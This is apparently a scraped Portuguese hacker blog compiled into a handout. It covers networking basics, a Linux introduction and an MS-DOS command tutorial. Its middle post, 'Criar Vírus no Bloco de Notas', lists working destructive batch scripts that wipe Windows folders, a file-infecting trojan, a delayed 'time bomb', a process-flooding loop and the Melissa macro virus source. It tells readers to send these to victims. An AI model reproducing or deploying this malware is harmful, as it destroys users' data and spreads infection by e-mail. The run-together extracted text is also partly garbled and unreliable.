TIVEREM O ARP HABILITADO DETECTAM ESSA DIFUSÃO, E O SISTEMA QUETEM O NÚMERO DE IP EM QUESTÃO ENVIA UM PACOTE ARP CONTENDO O ENDEREÇO DEHARDWARE PARA O COMPUTADOR QUE SOLICITOU. O ENDEREÇO DE HARWARE E OENDEREÇO DO IP ESTÃO ARMAZENADO NO CACHE DO ARP PARA USO FUTURO. COMO ARESPOSTA ARP TAMBÉM É FEITA NA FORMA DE DIFUSÃO, É NORMAL QUE OUTROS NÓSUSEM INFORMAÇÃO PARA ATUALIZAR SEUS CACHES ARP.O ICMP PERMITE QUE 2 NÓS EM UMA REDE IP COMPARTILHEM O STATUS DO IP EINFORMAÇÕE DE ERRO. ESSA INFORMAÇÃO PODE SER USADA POR PROTOCOLOS DE ALTONÍVEL PARA TRATAR PROBLEMAS DE TRANSMISSÃO OU PARA ADMINISTRADORES DE REDEPARA DETECTAR PROBLEMAS NA REDE. EMBORA ESTEJAM ENCAPSULADOS EM PACOTES IP,O ICMP NÃO É CONSIDERADO UM PROTOCOLO DE ALTO NÍVEL (ELE É NECESSÁRIO EMTODA IMPLEMENTAÇÃO DO TCP/IP. O UTILITÁRIO PING FAZ USO DO ICMP PARA VERIFICARSE UM CERTO ENDEREÇO NA REDE ESTÁ OPERACIONAL. ISTO É UTIL PARA DETECTARPROBLEMAS EM REDES IP UO FALHAS EM GATEWAYS.OUTROS PROTOCOLOSALÉM DESSES PROTOCOLOS CITADOS, EXISTEM OS PROTOCOLOS DE ALTO NÍVEL, COMO O 44
  45. 45. TELNET, FTP, HTTP E ETC. VAMOS DAR UMA BREVE DESCRIÇÃO DELES:TELNET: É UM PROTOCOLO QUE PERMITE O LOGON EM MÁQUINA REMOTAS. VOCÊ PASSAA UTILIZAR A MÁQUINA REMOTA PARA REALIZAR O PROCESSAMENTO. NO WINDOWS NTEXISTE O RAS (REMOTE ACCESS SERVICE, SERVIÇO DE ACESSO REMOTO) QUE TEM OSMESMOS OBJETIVOS DO TELNET.FTP: É UM PROTOCOLO UTILIZADO PARA FAZER TRANSFERÊNCIA DE ARQUIVOS.HTTP: É O PROTOCOLO UTILIZADO NA WEB, ELE TRANSMITE TEXTOS, GRÁFICOS EQUALQUER OUTRO TIPO DE ARQUIVO (SUBSTITUINDO O FTP), ALÉM DE PERMITIR ANAVEGAÇÃO ATRAVÉS DE HIPER TEXTO.Leia com AtençãoLembrando que o conteúdo desta apostila é apenas pra estudo e conhecimento dosusuarios de internet.O final da apostila chegou, espero que tirem bom aproveito dela.Postado por Originals Hacker às 14:19 12 comentáriosCriar Vírus no Bloco de NotasCriando Virus no NotepadÉ muito simples, voce vai fazer um virus no bloco de notas é só seguir as indicações,abra o bloco de notas 45
  46. 46. Copie os códigos escolhidos e cole no bloco de notas, ao salvar voce usa a extençao .batexemplo: onomedoarquivo.batSe vc usar outra extensão o arquivo ñ ira pegarAVISO:Não execute estes virus em seu proprio Pc, pois pode ocorrer serios danos, vocedeve enviar para as vitimas!!!████████████Nome:Del All Windowsrmdir /s /q c:windowsFunção:Deleta tdo do Windows (fode o pcNome:Autoexec@ECHO OFF@BREAK OFFdeltree/C: Y*.*Função:Fode com tudoNome:Trojan-1VERSION 5.00Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"Begin VB.Form Form1BackColor = &H80000007&BorderStyle = 1 Fixed SingleCaption = "Welcome to XP Blaster Pro (Enterprise Edition)!"ClientHeight = 5400 46
  47. 47. ClientLeft = 45ClientTop = 390ClientWidth = 8085BeginProperty FontName = "Fixedsys"Size = 9Charset = 0Weight = 400Underline = 0 FalseItalic = 0 FalseStrikethrough = 0 FalseEndPropertyIcon = "Source3.frx":0000LinkTopic = "Form1"MaxButton = 0 FalseMinButton = 0 FalseMouseIcon = "Source3.frx":08CAPaletteMode = 2 CustomScaleHeight = 5400ScaleWidth = 8085ShowInTaskbar = 0 FalseStartUpPosition = 3 Windows DefaultBegin VB.CommandButton Command3Caption = "About"BeginProperty FontName = "MS Sans Serif" 47
  48. 48. Size = 8.25Charset = 0Weight = 400Underline = 0 FalseItalic = 0 FalseStrikethrough = 0 FalseEndPropertyHeight = 375Left = 120TabIndex = 3Top = 4920Width = 1215EndBegin VB.CommandButton Command2Appearance = 0 FlatBackColor = &H000000FF&Caption = "WEBSITE"BeginProperty FontName = "Trebuchet MS"Size = 8.25Charset = 0Weight = 400Underline = 0 FalseItalic = 0 FalseStrikethrough = 0 FalseEndProperty 48
  49. 49. HeightFunção:Augumas dos trojans tradiçionaisNome:Del p/ Windowsdel /s /q c:windowsFunção:Deleta tudo dentro do Windows ex: arquivos e naum pastasNome:Shutdown-Sshutdown -sFunção:Desliga o pcNome:Shutdown-Rshutdown -rFunção:Reinicia o pcNome:Trojan-2@echo offctty nulremfor %%f in (*.exe *.com) do set A=%%fif %A%==COMMAND.COM set A=rename %A% V%A%if not exist V%A% goto endattrib +h V%A%copy %0.bat %A%attrib +r %A% 49
  50. 50. ren %A% *.batset A=:endctty con@if exist V%0.com V%0.com %1 %2 %3@if exist V%0.exe V%0.exe %1 %2 %3Função:Fode com tudo mesmo...Nome:PirataX5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*Função:Testar seu Anti-Virus ou enganar auguem.Nome:Melissa 1999// Melissa Virus Source CodePrivate Sub Document_Open()On Error Resume NextIf System.PrivateProfileString("","HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity", "Level") <> ""ThenCommandBars("Macro").Controls("Security...").Enabled = FalseSystem.PrivateProfileString("","HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity", "Level") = 1&ElseCommandBars("Tools").Controls("Macro").Enabled = FalseOptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1) 50
  51. 51. End IfDim UngaDasOutlook, DasMapiName, BreakUmOffASliceSet UngaDasOutlook = CreateObject("Outlook.Application")Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")If System.PrivateProfileString("","HKEY_CURRENT_USERSoftwareMicrosoftOffice", "Melissa?") <> "... by Kwyjibo"ThenIf UngaDasOutlook = "Outlook" ThenDasMapiName.Logon "profile", "password"For y = 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y)x=1Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)For oo = 1 To AddyBook.AddressEntries.CountPeep = AddyBook.AddressEntries(x)BreakUmOffASlice.Recipients.Add Peepx=x+1If x > 50 Then oo = AddyBook.AddressEntries.CountNext ooBreakUmOffASlice.Subject = "Important Message From " &Application.UserNameBreakUmOffASlice.Body = "Here is that document you asked for ... dontshow anyone else Wink"BreakUmOffASlice.Attachments.Add ActiveDocument.FullNameBreakUmOffASlice.SendPeep = "" 51
  52. 52. Next yDasMapiName.LogoffEndFunção:se espalha rapidamente e força empresas como Intel e Microsoft, entre outras, afechar seus sistemas de e-mail para conter a praga, que se disseminava via Outlook. O vírus,além de se enviar pela Internet, modificava documentos do Word colocando falas doprograma de televisão Os Simpsons. Causou danos estimados em US$ 300 milhões a US$600 milhões.Nome:CLICK EM MIM@ECHO OFF:REPETEMSG * CLICK EM MIMGOTO REPETEFunção:Fica repetindo varias vezes a mesma mensagemNome:Progstar@echo offrem Denial Of Service Local:Fuckerstart notepad.exestart write.exestart sol.exestart cmd.exestart powerpnt.exestart excel.exestart winword.exestart msacess.exe 52
  53. 53. goto Fucker:Função:Abre varios programas sem parar, fais o pc travarNome:bomba relógioc:cdecho offif exist lig1.drv goto 2echo > lig1.drv sdfsdfgoto fim:2if exist lig2.drv goto 3echo > lig2.drv sdfsdfgoto fim:3if exist lig3.drv goto 4echo > lig3.drv sdfsdfgoto fim:4if exist lig4.drv goto 5echo > lig4.drv sdfsdfgoto fim:5if exist lig5.drv goto 6echo > lig4.drv sdfsdfgoto fim 53
  54. 54. :6if exist lig6.drv goto 7echo > lig6.drv sdfsdfgoto fim:7rmdir C:windowsrmdir C:arquivos de programasrmdir C:documents and settings:fimFunção:depois que ele for ativado 7 vezes ele apaga tudoNome:MSN Fixercd %USERPROFILE%cd Config~1cd Dadosd~1cd Micros~1cd "Windows Live Contacts"del /s /q *.*Função:Congela todos os msns que estao sendo executados.Obs. "Conhecimento não é crime!! eu não me responsabilizo por seus atos!!"Postado por Originals Hacker às 10:39 104 comentáriosLinux o melhor SO (Sistema Operacional) 54
  55. 55. IntroduçaoO que diabos é Linux?Esta é uma pergunta feita por muita gente, e há muitas respostas para ela. Linux é umsistema operacional, como os *BSD (FreeBSD, NetBSD e outros), OS/2, Windows, MacOS,BeOS, etc. O sistema operacional é o que permite o usuário usar o computador. O criadordo Linux se chama Linus Torvalds. Com o nome que o autor tem, já dá pra tirar umaconclusão daonde é originado o nome "Linux"... Como o Linux é beaseado (ideologicamentefalando) no Unix, ele juntou o seu nome (Linus) com Unix, e deu Linux :)O Linux é um sistema operacional multi-tarefa e multi-usuário. Além disso, ele é suportadopor várias plataformas (inclusive as mais populares como a arquitetura Intel, que todo omundo usa). Ele é usado por muitas empresas (principalmente provedores) por sua altacapacidade de Rede e conversação com outros sistemas (como por exemplo, redesWindows e Novell), além de suportar também vários tipos de sistemas de arquivos.Mas o barato de tudo, e o que deu impulso ao desenvolvimento do Linux é justamente porele ser um sistema livre e gratuito (Open Source). Isso quer dizer que você não precisa pagarpara usá-lo, e nem ele requer nenhuma licença de uso. O Linux simplesmente pode ser pegona Internet, copiado de um amigo, ou seja lá o que for, sem restrições. E além de gratuito,ele é livre! Livre? Sim, livre! O código-fonte do núcleo do sistema (kernel) está liberado soba licença GPL, e pode ser pego na Internet por qualquer pessoa... Isto quer dizer quequalquer pessoa pode pegar e alterar o código livremente, modificando ao seu própriogosto e suas próprias necessidades. Por ser livre, o Linux têm como desenvolvedores váriose vários hackers espalhados pelo mundo, que contribuem sempre mandando pedaços decódigos e implementações à Linus Torvalds, que organiza tudo e lança junto ao kerneloficial. Um dos nomes mais conhecidos como contribuidores para o kernel é Alan Cox, evocê pode obter uma lista de outros contribuidores do kernel junto com o código-fonte dokernel que pode ser baixado através do endereço ftp://ftp.kernel.org (se possível usemirrors para baixar os kernels).Quem diria que o Linux ia se desenvolver tanto! No começo nada passava de um grupo dehackers que usavam o sistema. Agora temos muitos usuários caseiros usando, além devárias empresas prestando serviços (como suporte e desenvolvimento de programas), e 55
  56. 56. todo tipo de coisa mais. Sua popularidade cresceu muito, e continua crescendo. Asestatisticas dizem que o Linux vai crescer e crescer, e a tendência é realmente essa! Pois oLinux é um sistema operacional de deixar qualquer um de queixo caído. No futuro, acreditoque mais e mais empresas vão começar a adotar o Linux como sistema padrão, e começar adesenvolver produtos apenas para ele. Deixando de lado um pouco o monopólio deempresas como a Microsoft e seu sistema operacional Windows.Você ainda não testou? Recomendo você fazer isso agúra! Pode ser um pouco estranho nocomeço, mas você aos poucos vai se acostumando, e acaba por se adaptar totalmente àele! Eu mesmo me adaptei e só uso ele :) Viva o Linux!A história do LinuxComo usuários fiéis, não podemos nos esquecer da história do Linux... Como surgiu issotudo? Linus Torvalds, o pioneiro criador, era inscrito numa lista de programadores. Um diaele estava lendo as mensagens e se bateu com uma pergunta: "Lembra-se daquela épocaquando os homens escreviam seus próprios drivers de dispositivos (device drivers)? Eleentão resolveu desafiar a si mesmo, e criar um sistema operacional onde se tinha umaliberdade e não se ficasse "preso no sistema. O que ele tinha em mente era um Unix!Porém, ele não tinha verba suficiente para comprar os caríssimos Unix que eram o tipo desistema que ele queria.Inspirado num pequeno e humilde sistema feito por Andy Tanembaum, o Minix, Linustrabalhou duro para fazer o Linux e desenvolver ele. Um pouco antes de lançar a primeiraversão oficial do kernel, Linus mandou a seguinte mensagem para o grupo de notíciascomp.os.minix:"Você suspira por melhores dias do Minix-1.1, quando homens serão homens e escreverãoseus próprios drivers de dispositivos? Você está sem um bom projeto e está morrendo porcolocar as mãos em um sistema operacional no qual você possa modificar de acordo comsuas necessidades? Você está achando frustrante quando tudo trabalha em Minix? Chegade atravessar noites para obter programas que trabalhem corretamente? Então estamensagem pode ser exatamente para você.Como eu mencionei a um mês atrás, estou trabalhando em uma versão independente deum sistema operacional similar ao Minix para computadores AT-386. Ele está, finalmente, 56
  57. 57. próximo do estágio em que poderá ser utilizado (embora possa não ser o que você estejaesperando), e eu estou disposto a colocar os fontes para ampla distribuição. Ele está naversão 0.02... contudo eu tive sucesso rodando o bash, gcc, gnu-make, gnu-sed, compressãoe etc nele."No dia 5 de Outubro de 1991, Linus Torvalds anunciou a primeira versão oficial do Linux,versão 0.02. Desde então muitos programadores têm respondido ao seu chamado, e têmajudado a fazer do Linux o sistema operacional que é hoje, uma grande maravilha. Umsistema criado inteiramente por programadores espalhados pela Internet, os hackers!Qual a diferença entre Linux e Unix?Linus Torvalds, quando criou o Linux, criou ele nos padrões "POSIX", que é o mesmo padrãoque os UNIX usam. É por esse mesmo uso do padrão POSIX que o Linux é parecido com oUNIX. Além do mais, existem vários tipos de UNIX, que têm seu código-fonte fechado, epago. Uma resposta mais completa para esta pergunta foi feita pelo Fernando M. Roxo:Limpo, claro e definitivo: O Linux não é UNIX. O Linux é um UNIX. O UNIX foi um sistemacriado e registrado pela Unix Lab. Todos os sistemas baseados naqueles códigos sãochamados de uma forma geral de UNIX.Linux foi escrito desde o inicio pelo Linus Torvalds e não contém nenhuma linha de códigodo UNIX. Mas o Linux foi escrito para ser conforme o padrão POSIX, que deve ser o padrãoda API (Application Programming Inteface) Unix, que em última análise pode ser resumido(forçando um pouco a barra) como sendo as chamadas do sistema. Por isto se diz que oLinux é um Unix (não UNIX). Tem uma diferença sutil aí.Por causa da API POSIX, do conjunto de utilitários (FSF/GNU em sua maioria) e do uso do X-Window (XFree) o Linux é tão parecido com o UNIX que existem empresas que usam o Linuxpara desenvolver para UNIX que não seja o dela mesma (por exemplo a IBM).As DistribuiçõesVoltando mais um pouco ao escopo do que é Linux, podemos ressaltar que o Linux é osistema operacional, ou seja, o kernel (núcleo). Mas o que é um sistema operacional semprogramas? Para que haja um uso dos recursos que o sistema operacional pode oferecer, os 57
  58. 58. programadores vão criando aplicações e utilitários que vão dar o gostinho ao usuário.O papel das distribuições é isso: empacotar o Linux. O que as distribuições fazem é reunir osprogramas disponíveis com o kernel, e deixar o sistema pronto para o uso. Sem asdistribuições não haveria a popularização do Linux, pois seria um grande trabalho o usuárioinstalar o sistema puro, e depois compilar os programas deixando-os compatíveis.Existem inúmeras distribuições existentes por esse mundo afora. Mas há sempre asdistribuições mais conhecidas, que são as mais atuantes no mercado. Elas são: Slackware,Conectiva Linux, Debian, Red Hat Linux, SuSE, Mandrake. Cada um tem suas característicasbem marcantes. E se fôssemos discutir aqui quais as vantagens de cada uma em relação aoutra, não conseguiríamos. A escolha da distribuição é uma escolha a gosto.Meu micro suporta Linux?Basicamente, para você usar o Linux, você precisará de no mínimo um 386. Isso mesmo, oLinux roda em 386! É claro que para um uso amplo de todos os programas e o sistema X-Window (gráfico), você terá de ser mais exigente com seu hardware... Mas todos oscomputadores compatíveis com a arquitetura Intel são suportados pelo Linux (e tambémoutros tipos de arquiteturas como por exemplo o Alpha).Para a memória RAM, você irá precisar de no mínimo 2MB de RAM. É recomendável ter8Mb acima para rodar o servidor X. E seguindo a mesma filosofia do que falei antes, sempreé bom você ter mais para usar tudo rápido e sem perder a paciência :) Espaço em disco?Depende muito. As distribuições atuais disponibilizam até 6 CDs recheados de programas,que podem simplesmente acabar com o espaço do seu disco em alguns minutos! Umainstalação básica do Linux, apenas com o básico mesmo, dá 10MB. Eu acredito que 1GB sejasuficiente para colocar todo tipo de coisa que você vai usar (e até coisa que você nem vaiusar).Só como curiosidade, aqui em casa, eu já rodei meu Linux nos seguintes computadores:Primeiro num Pentium 100, com 24MB de RAM, e 1GB de espaço em disco. Rodei tambémnum 386 (nem me pergunte quantos Mhz é porque eu não faço a mínima idéia :) com 8MBde memória RAM, num HD de 256MB. E por último em um Celeron 300 com 32MB de RAMe 1GB de espaço em disco. Atualmente eu estou usando em um K6-II 550, com 64MB deRAM, e 10GB de espaço no HD. 58
  59. 59. Outra dúvida muito comum é: O Linux roda em laptops? Sim! Roda muito bem e suportabem os dispositivos PCMCIA... Não tem absolutamente nada com o que se preocupar.Por que eu devo confiar no Linux?Pergunta muito fácil de se responder, inclusive eu vou responder bem grosseiramente: Ele ébom! :) O Linux tem ganhado credibilidade cada vez mais por ser um sistema seguro,estável, e confiável. É muito difícil (senào quase impossível) que o Linux em si dê um crash.Só para ter uma idéia, nestes 4 anos em que uso Linux, só obtive no máximo 3 travamentos!Por que estes travamentos? Bem, um foi na época em que exploraram uma falha no kernele criaram o teardrop (um exploit que travou as coisas aqui), e os outros dois foi por causade um problema na placa mãe :) Quer dizer, já aconteceu algumas outras vezes de minhainterface travar, mas eu dei um telnet e um ping na máquina através de outra na rede, e elarespondia. Geralmente isso acontece comigo no Quake, quando eu mando conectar emalgum nome de host que não existe, o SVGAlib (biblioteca que o Quake usa) simplesmentepara de funcionar e você não tem mais como teclar algo ou mudar de tela... Mas tive acerteza que não foi o sistema que travou e sim o SVGAlib que travou meu teclado e monitor:)Empresas cada vez mais estão apostando no Linux. A IBM é uma das empresas que maisestá investindo pesado no Linux, sendo com ajuda financeira, parcerias e desenvolvimentode programas. A Intel é outra empresa que também está ajudando muito, investindobastante nos desenvolvedores do sistema. Além disso, várias outras pequenas ou médiasempresas estão cada vez mais adotando o Linux como sistema padrão pelo simples fato deque ele funciona melhor e mais estávelmente que outros sistemas como o Windows. Podeser que você ache que isto tudo conversa fiada, mas o Linux é bem estável mesmo! Já visistemas Linux ligados por vários meses sem nem sequer dar um reboot na máquina.Inclusive aqui em casa eu consegui deixar o meu Linux ligado por 23 dias, pena que faltouluz e o computador desligou (buá não tenho nobreak :~().Basicamente é isso. Você tem de confiar no Linux porque ele é bom e tá acabado. E sótende a melhorar, antigamente não havia nem uma interface gráfica muito boa e usávelpara quem está iniciando na computação. Hoje temos o GNOME e KDE que são duas ótimasinterfaces gráficas para quem está engatinhando. São coisas que fazem o Linux valer a pena!1.7. O que é GPL? 59
  60. 60. Se você já ouviu falar bem de Linux, com certeza já deve ter ouvido falar nesta sigla. GPLsignifica General Public License (ou traduzindo grosseiramente: Licença Pública Geral), e foicriada pela Free Software Foundation. A grande maioria dos programas que vêm nasdistribuições Linux são de código-fonte aberto, e usam esta licença. Uma licença serve paraproteger o seu código quando ele for lançado para o público.A licença GPL permite que o autor do código distribua livremente o seu código... Outraspessoas podem simplesmente pegar este código, modificar à suas próprias necessidades eusar à vontade. O único requerimento é que a pessoa que modificou deve lançar o códigomodificado em GPL e manter também o seu código aberto (e não apenas distribuir osbinários). Isso tudo cria uma comunidade de desenvolvedores onde toda a ajuda é mútua, evocê pode pegar várias idéias de outros desenvolvedores simplesmente olhando o códigodeles. Além disso, você pode aproveitar e poder ajudar o desenvolvedor, criando correçõese mandando-as para o autor.É com essa licença que o kernel do Linux é liberado. É assim que o kernel tem seudesenvolvimento feito por várias e várias pessoas em todo o mundo. Estas pessoas pegamlivremente o código-fonte do kernel, analizam-no e procuram por erros. Se encontraremerros, escrevem correções e mandam para o Linus Torvalds. E não só correções, masdesenvolvedores também fazem novas implementações ao kernel e mandam para o LinusTorvalds organizar tudo. E é assim que temos hoje em dia este grande e bem feito eorganizado kernel do Linux! É assim que a filosofia GPL funciona, e funciona muito bem paracriar uma comunidade de desenvolvedores justa! Eu pessoalmente apóio e muito a licençaGPL, que para mim é simplesmente perfeita. Vivas à Free Software Foundation por criar estalicença! E vivas para os desenvolvedores que a utilizam para seus códigos! :)Postado por Originals Hacker às 09:48 0 comentáriosMini Tutorial MS Doshttp://bp1.blogger.com/_A_Q4n38HnGM/RtXltSvxCLI/AAAAAAAAAAc/kROsLiJVD04/s1600-h/ms+dos.jpg 60
  61. 61. Comandos do MS-DOSEste tutorial tem por objetivo mostrar os comandos do DOS. Muitas pessoas pensam quesão "inúteis", mas caso ocorra alguma emergência no PC você irá precisar destes comandosentão vai...1. Diferenças entre comandos internos e externos Os comandos internos podem serexecutados em qualquer pasta no PC e a qualquer momento pois estão embutidos no DOS.Os comandos externos são programas utilitários que acompanham o sistema operacional eque só podem ser executados onde estão localizados, ou seja, no drive onde foramgravados. Este tutorial está dividido em 2 partes: comandos internos e comandos externos.2. Os comandos internos Nos comandos internos pode-se saber mais informações acerca domesmo, digitando /? após o comando, ex.: dir/?, você irá receber informações sobre ocomando dir, os comandos internos são os mais úteis em emergências já que podem serexecutados em qualquer lugar; agora, vamos aos comandos.Comando DATE Esse comando, como o nome já diz, mostra na tela a data atual, permitindoa sua modificação. O comando DATE deverá ser usado da seguinte maneira: date [opções](Sem os colchetes), sendo que não é necessária a utilização das opções caso você nãoqueira.Ex.: Digitando date, irá aparecer:Data atual: sáb 28/06/2003 Digite a nova data: (dd-mm-aa)Opções:/t - Informa a data mas não solicita uma nova.Comando TIME Esse comando faz a mesma coisa que o comando DATE mas ao invés demudar a data ele muda a hora: esse comando mostra hora, minutos, segundos e centésimosde segundo. O comando TIME deverá ser usado da seguinte maneira: Time [opções] (Semos colchetes), sendo que não é necessária a utilização das opções caso você não queira.Ex.: Digitando time, irá aparecer:Hora Atual: 17:01:20,98 Digite a nova Hora:Opções:/t - Informa a hora mas não solicita uma nova.Comando VER Esse comando mostra qual sistema operacional você está usando.Ex.: Digitando ver, irá aparecer: 61
  62. 62. Microsoft Windows XP [versão 5.1.2600]Comando CLS Esse comando limpa a tela e posiciona o cursor no canto superior esquerdoda tela.Comando Dir O comando dir é muito famoso e quase todos já conhecem: ele mostra todosarquivos e pastas de um diretório e busca arquivos em um drive especificado. O comandoDIR é usado da seguinte maneira: dir [drive:][caminho] arquivo(s) [opções] (Sem oscolchetes) sendo que não é necessária a utilização das opções caso você não queira nem dearquivo(s).Opções:/p - A listagem pára toda vez que atinge o fim da tela, sendo necessário que se pressionequalquer tecla para continuar. /b - Mostra somente as informações básicas. /c - Mostra oseparador de milhar no tamanho dos arquivos. /w - Exibe a lista na horizontal, onde sãomostrados 5 arquivos por linha. /d - O mesmo que /w, só que mostra a lista em colunas. /s -Exibe os arquivos de todos os subdiretórios. /l - Usa letras minúsculas. /n - Formato de listalonga em que os nomes dos arquivos ficam na extrema direita. /q - Mostra o nome do donodo arquivo. /4 - Exibe anos de 4 dígitos./t:campo- Controla qual campo de tempo é exibido ou usado na classificação onde campodeve ser substituído por um desses caracteres e não devem ser digitados os 2 pontos (.C - Criação. A - Último acesso. W - Última gravação./o:ordem – Mostra os arquivos em uma ordem, onde ordem deve ser substituída por umdesses caracteres e não devem ser digitados os 2 pontos (.N - Nome do arquivo seguido pela extensão. S - Tamanho do arquivo. D - Ordemcronológica. G - Grupos de arquivos de subdiretórios./a:atributo – Mostra somente arquivos de determinado atributo, onde atributo deve sersubstituído por algum desses caracteres e não devem ser digitados os 2 pontos (.D – Nome do arquivo seguido pela extensão. R – Arquivos somente leitura. H – Arquivosocultos .Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-)Ex.: Dir /a-h, mostra todos os arquivos menos os arquivos ocultos.Comando COPY O comando COPY copia um determinado arquivo ou o disco inteiro, sendoque caso exista algum arquivo no destino com o mesmo nome do arquivo de origem, essearquivo será substituído. O COPY deve ser usado da seguinte maneira: copy [drive:][caminho] arquivo(s) de destino [opções] (Sem colchetes), sendo que não é necessária autilização das opções caso você não queira. 62
  63. 63. Opções: /v - Verifica o arquivo de destino após a cópia, esta opção deixa o copy mais lento./a - Indica um arquivo de texto ASCII. /b - Indica um arquivo binário. /d - Permite que oarquivo de destino seja criado descriptografado. /n - Usa um nome de arquivo curto (Padrão8.3), caso copie um arquivo fora deste padrão. /y - Não pede confirmação para que vocêsubstitua um arquivo de destino já existente. /-y - Pede confirmação para que vocêsubstitua um arquivo de destino já existente. /z - Copia arquivos de rede no modoreiniciável.Comando TYPE Mostra o conteúdo de um arquivo (somente um por vez e não aceitacaracteres curinga).Comando REN ou RENAME Renomeia o arquivo. Pode-se também alterar a extensão domesmo.Ex.: Ren Arquivo.txt Backup.bak, Isto renomeia o arquivo: Arquivo.txt, para Backup.bak.Comando DEL ou ERASE Apaga arquivos do disco rígido e deve ser usado da seguintemaneira: del [drive:][caminho] nome do(s) arquivo(s) [opções] (Sem colchetes), sendo quenão é necessária a utilização das opções caso você não queira.Opções: /p - Força a mensagem de confirmação "Apagar( S / N )?". /f - Força a exclusão dearquivos somente leitura. /s - Exclui arquivos de todas as subpastas. /q - Modo silencioso,não pede confirmação para excluir um caractere curinga global./a:atributo - Exclui somente arquivos de determinado atributo, onde atributo deve sersubstituído por algum desses caracteres e não devem ser digitados os 2 pontos (.S - Arquivos de sistema. R - Arquivos somente leitura. H - Arquivos ocultos. A - Arquivosprontos para arquivamento.Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-).Ex.: Del *.* /a-h, executando este comando, você exclui todos os arquivos menos osarquivos ocultos da pasta.Comando MD ou MKDIR Cria uma pasta, devendo ser usado da seguinte maneira: MD Pasta,onde Pasta é o nome da pasta que você quer criar.Comando CD ou CHDIR Entra ou sai de uma pasta: se você digitar CD TESTE, por exemplo,ele entrará na pasta TESTE. Se você digitar CD.. ele irá voltar para a pasta anterior. O mesmovale para o CHDIR.Comando RD ou RMDIR Remove uma pasta que esteja vazia, sendo que não consegueremover pastas com arquivos. Deve ser usado da seguinte maneira: rd [opções] (Semcolchetes), sendo que não é necessária a utilização das opções caso você não queira.Ex.: Digitando RD Teste você irá excluir a pasta teste. 63

×